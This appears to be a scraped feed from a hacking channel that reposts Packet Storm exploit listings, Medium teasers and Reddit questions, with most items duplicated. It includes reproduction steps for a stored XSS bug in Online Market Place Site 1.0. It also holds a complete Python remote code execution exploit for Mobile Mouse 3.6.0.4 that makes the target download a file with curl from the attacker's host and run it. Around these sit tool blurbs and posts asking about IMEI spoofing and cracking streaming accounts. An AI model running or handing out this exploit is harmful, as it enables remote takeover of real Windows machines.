Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Market Place Site 1.0 Cross Site Scripting
https://2.bp.blogspot.com/-OQpvXY0U-U0/WWlvZUlJM8I/AAAAAAAAIOw/4zP2-mVc-vo2HWf5V3aXS_jzwpZLTa24QCLcBGAs/s1600/h59.png
Online Market Place Site version 1.0 suffers from a persistent cross site scripting vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Online Market Place Site 1.0 Cross Site Scripting
https://2.bp.blogspot.com/-OQpvXY0U-U0/WWlvZUlJM8I/AAAAAAAAIOw/4zP2-mVc-vo2HWf5V3aXS_jzwpZLTa24QCLcBGAs/s1600/h59.png
Online Market Place Site version 1.0 suffers from a persistent cross site scripting vulnerability.
SHA-256 |
6dbdfadfd046c1d428d90778b682265b97787399b579cf8c236ae782a910255bDownload
# Exploit Title: Online Market Place Site v1.0 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Joe Pollock
# Date: September 03, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip
# Tested on: Kali Linux, Apache, Mysql
# CVE: CVE-2022-30003 (RESERVED)
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Online Market Place Site v1.0 suffers from an authenticated stored Cross-Site Scripting (XSS) vulnerability allowing attackers to register
# as a Seller then create new products containing XSS payloads in the 'Product Title' and 'Short Description' fields.
To reporduce:
1. Sign as a Seller (or create an account) then add a product by navigating to 'Products' > 'Add New'.
2. Add an XSS payload (e.g. ) within the 'Product Title' and/or 'Short Description' fields.
3. Click 'SAVE' - the XSS payload(s) will be executed immediately or anytime the product is viewed.
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online Market Place Site 1.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Apple macOS Remote Events Memory Corruption
___________________________
@hacking_Attack
@Hacking_Video
Apple macOS Remote Events Memory Corruption
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Apple macOS Remote Events Memory Corruption
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
cryptmount Filesystem Manager 6.0
https://3.bp.blogspot.com/-Ct9xsH2cBRo/WWlviFueiJI/AAAAAAAAIQc/IuoXrqbibrUTnkZ-3FJLKgVXuEB0NPH5wCLcBGAs/s1600/h92.png
cryptmount is a utility for creating and managing secure filing systems on GNU/Linux systems. After initial setup, it allows any user to mount or unmount filesystems on demand, solely by providing the decryption password, with any system devices needed to access the filing system being configured automatically. A wide variety of encryption schemes (provided by the kernel dm-crypt system and the libgcrypt library) can be used to protect both the filesystem and the access key. The protected filing systems can reside in either ordinary files or disk partitions. The package also supports encrypted swap partitions, and automatic configuration on system boot-up.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
cryptmount Filesystem Manager 6.0
https://3.bp.blogspot.com/-Ct9xsH2cBRo/WWlviFueiJI/AAAAAAAAIQc/IuoXrqbibrUTnkZ-3FJLKgVXuEB0NPH5wCLcBGAs/s1600/h92.png
cryptmount is a utility for creating and managing secure filing systems on GNU/Linux systems. After initial setup, it allows any user to mount or unmount filesystems on demand, solely by providing the decryption password, with any system devices needed to access the filing system being configured automatically. A wide variety of encryption schemes (provided by the kernel dm-crypt system and the libgcrypt library) can be used to protect both the filesystem and the access key. The protected filing systems can reside in either ordinary files or disk partitions. The package also supports encrypted swap partitions, and automatic configuration on system boot-up.
SHA-256 |
86528a9175e1eb53f60613e3c3ea6ae6d69dbfe5ac2b53b2f58ba0f768371e7eDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
cryptmount Filesystem Manager 6.0
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Nmap Port Scanner 7.93
https://3.bp.blogspot.com/-Ct9xsH2cBRo/WWlviFueiJI/AAAAAAAAIQc/IuoXrqbibrUTnkZ-3FJLKgVXuEB0NPH5wCLcBGAs/s1600/h92.png
Nmap is a utility for port scanning large networks, although it works fine for single hosts. Sometimes you need speed, other times you may need stealth. In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.). Nmap supports Vanilla TCP connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments (bypasses some packet filters), TCP ACK and Window scanning, UDP raw ICMP port unreachable scanning, ICMP scanning (ping-sweep), TCP Ping scanning, Direct (non portmapper) RPC scanning, Remote OS Identification by TCP/IP Fingerprinting, and Reverse-ident scanning. Nmap also supports a number of performance and reliability features such as dynamic delay time calculations, packet timeout and retransmission, parallel port scanning, detection of down hosts via parallel pings.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Nmap Port Scanner 7.93
https://3.bp.blogspot.com/-Ct9xsH2cBRo/WWlviFueiJI/AAAAAAAAIQc/IuoXrqbibrUTnkZ-3FJLKgVXuEB0NPH5wCLcBGAs/s1600/h92.png
Nmap is a utility for port scanning large networks, although it works fine for single hosts. Sometimes you need speed, other times you may need stealth. In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.). Nmap supports Vanilla TCP connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments (bypasses some packet filters), TCP ACK and Window scanning, UDP raw ICMP port unreachable scanning, ICMP scanning (ping-sweep), TCP Ping scanning, Direct (non portmapper) RPC scanning, Remote OS Identification by TCP/IP Fingerprinting, and Reverse-ident scanning. Nmap also supports a number of performance and reliability features such as dynamic delay time calculations, packet timeout and retransmission, parallel port scanning, detection of down hosts via parallel pings.
SHA-256 |
2b6f736f4ac5ddb55962af13ec96274ec12dd2447e74f28ffd89ebae47abcc1eDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Nmap Port Scanner 7.93
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Mobile Mouse 3.6.0.4 Remote Code Execution
https://3.bp.blogspot.com/-SgyDIXUTMbc/WWlu_miSAcI/AAAAAAAAIKE/fKFdSswhFNIqExJ_09QJseTEI_nz_ynRACLcBGAs/s1600/h119.png
Mobile Mouse version 3.6.0.4 suffers from a remote code execution vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Mobile Mouse 3.6.0.4 Remote Code Execution
https://3.bp.blogspot.com/-SgyDIXUTMbc/WWlu_miSAcI/AAAAAAAAIKE/fKFdSswhFNIqExJ_09QJseTEI_nz_ynRACLcBGAs/s1600/h119.png
Mobile Mouse version 3.6.0.4 suffers from a remote code execution vulnerability.
SHA-256 |
2509530b624f14ddbe319dfa5afe878c807b92ada8714c91def25fbb67763a6eDownload
# Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution
# Date: Aug 09, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mobilemouse.com/
# Software Link: https://www.mobilemouse.com/downloads/setup.exe
# Version: 3.6.0.4
# Tested on: Windows 10 Enterprise LTSC Build 17763
#!/usr/bin/env python3
import socket
from time import sleep
import argparse
help = " Mobile Mouse 3.6.0.4 Remote Code Execution "
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--target", help="Target IP", required=True)
parser.add_argument("--file", help="File name to Upload")
parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1")
args = parser.parse_args()
host = args.target
command_shell = args.file
lhost = args.lhost
port = 9099 # Default Port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B7269
68616D6D6564691E6950686F6E651E321E321E04")
s.send(CONN)
run = s.recv(54)
RUN = bytearray.fromhex("4b45591e3131341e721e4f505404")
s.send(RUN)
run = s.recv(54)
sleep(0.5)
download_string= f"curl http://{lhost}:8080/{command_shell} -o
c:\Windows\Temp\{command_shell}".encode('utf-8')
hex_shell = download_string.hex()
SHELL = bytearray.fromhex("4B45591E3130301E" + hex_shell + "1E04" +
"4b45591e2d311e454e5445521e04")
s.send(SHELL)
shell = s.recv(96)
print ("Executing The Command Shell...")
sleep(5)
RUN2 = bytearray.fromhex("4b45591e3131341e721e4f505404")
s.send(RUN2)
run2 = s.recv(54)
sleep(0.8)
shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8')
hex_run = shell_string.hex()
RUN3 = bytearray.fromhex("4B45591E3130301E" + hex_run + "1E04" +
"4b45591e2d311e454e5445521e04")
s.send(RUN3)
run3 = s.recv(96)
print (" Take The Rose")
sleep(50)
s.close()
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Mobile Mouse 3.6.0.4 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hacking Web Applications
https://cdn-images-1.medium.com/max/817/1*mY4A2SH8fN19DQhnW9TP5w.png
Web Application
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Hacking Web Applications
https://cdn-images-1.medium.com/max/817/1*mY4A2SH8fN19DQhnW9TP5w.png
Web Application
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hacking Web Applications
Web Application
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TikTok niega violación de datos que supuestamente expuso la información de más de 2 mil millones de…
https://cdn-images-1.medium.com/max/1716/0*Dm1XHeZSuda7nR8Q
El popular servicio de video social de formato corto TikTok negó los informes de que fue violado por un grupo de piratas informáticos…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TikTok niega violación de datos que supuestamente expuso la información de más de 2 mil millones de…
https://cdn-images-1.medium.com/max/1716/0*Dm1XHeZSuda7nR8Q
El popular servicio de video social de formato corto TikTok negó los informes de que fue violado por un grupo de piratas informáticos…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TikTok niega violación de datos que supuestamente expuso la información de más de 2 mil millones de usuarios
El popular servicio de video social de formato corto TikTok negó los informes de que fue violado por un grupo de piratas informáticos…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Top 25 Cyber Security Newsletters
Periodic cyber security newsletters that capture the latest news, summaries of conference talks, research, best practices, tools, events…
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
Top 25 Cyber Security Newsletters
Periodic cyber security newsletters that capture the latest news, summaries of conference talks, research, best practices, tools, events…
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Top 25 Cyber Security Newsletters
Periodic cyber security newsletters that capture the latest news, summaries of conference talks, research, best practices, tools, events…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
ArtMoney — Get Unlimited Lives to Win the Game
https://cdn-images-1.medium.com/max/1280/0*j5-B8jY-PWy4cDPm
ArtMoney is a cheating software that changes the hex values of numbers in video games. It uses the same formulas used by game developers…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
ArtMoney — Get Unlimited Lives to Win the Game
https://cdn-images-1.medium.com/max/1280/0*j5-B8jY-PWy4cDPm
ArtMoney is a cheating software that changes the hex values of numbers in video games. It uses the same formulas used by game developers…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
ArtMoney — Get Unlimited Lives to Win the Game
ArtMoney is a cheating software that changes the hex values of numbers in video games. It uses the same formulas used by game developers…
Hacking on Medium
What is The Root Cause of Ransomware Attacks?
https://cdn-images-1.medium.com/max/2240/1*5WUhJAAHwf3EpKIaFl08jw.png
Do you know what is the root cause of the majority of ransomware attacks? It is the error in the configurations in the systems and devices…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
What is The Root Cause of Ransomware Attacks?
https://cdn-images-1.medium.com/max/2240/1*5WUhJAAHwf3EpKIaFl08jw.png
Do you know what is the root cause of the majority of ransomware attacks? It is the error in the configurations in the systems and devices…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
What is The Root Cause of Ransomware Attacks?
Do you know what is the root cause of the majority of ransomware attacks? It is the error in the configurations in the systems and devices…
hacking: security in practice
Burner phones
Excuse my ignorance but why are burner phones trashed? I understand the concept of it. It’s usually a flip phone that is used a few times times to communicate a few times before disposed because they are inexpensive and virtually unhackable. Why wouldn’t they just take the SIM out and get a new one?
I’ve done my research and found out how cellphone signals are triangulated. SIM cards can also carry information and can provide the IMEI from a phone to cellular carriers. Most tracking and hacking is done on smartphone these days. What are the chances of government agencies keeping tabs on that IMEI to see if it reconnects to a specific carrier?
In terms of the phone I understand that the IMEI is programmed into the phone and the numbers come off a database that can identify the phone manufacture and model. I wondered why isn’t there a tool that can spoof IMEI numbers into believing it’s another phone model that is currently not in use. I know each phone processor is different and they all use a different set of instructions so maybe a universal tool is not viable but say only for a specific phone brand or model.
Is such tool possible to create? And also why can’t people just swap out SIM cards?
Didn’t know where else to post I’ve just been curious for a long time.
submitted by /u/FapTapAnon
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Burner phones
Excuse my ignorance but why are burner phones trashed? I understand the concept of it. It’s usually a flip phone that is used a few times times to communicate a few times before disposed because they are inexpensive and virtually unhackable. Why wouldn’t they just take the SIM out and get a new one?
I’ve done my research and found out how cellphone signals are triangulated. SIM cards can also carry information and can provide the IMEI from a phone to cellular carriers. Most tracking and hacking is done on smartphone these days. What are the chances of government agencies keeping tabs on that IMEI to see if it reconnects to a specific carrier?
In terms of the phone I understand that the IMEI is programmed into the phone and the numbers come off a database that can identify the phone manufacture and model. I wondered why isn’t there a tool that can spoof IMEI numbers into believing it’s another phone model that is currently not in use. I know each phone processor is different and they all use a different set of instructions so maybe a universal tool is not viable but say only for a specific phone brand or model.
Is such tool possible to create? And also why can’t people just swap out SIM cards?
Didn’t know where else to post I’ve just been curious for a long time.
submitted by /u/FapTapAnon
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
From the hacking community on Reddit
Explore this post and more from the hacking community
hacking: security in practice
How accounts are cracked? (netflix,spotify,...)
Just as the title says, how cracks work in term of cracking accounts like spotify,netflix...
submitted by /u/Joe-seph002
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How accounts are cracked? (netflix,spotify,...)
Just as the title says, how cracks work in term of cracking accounts like spotify,netflix...
submitted by /u/Joe-seph002
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
From the hacking community on Reddit
Explore this post and more from the hacking community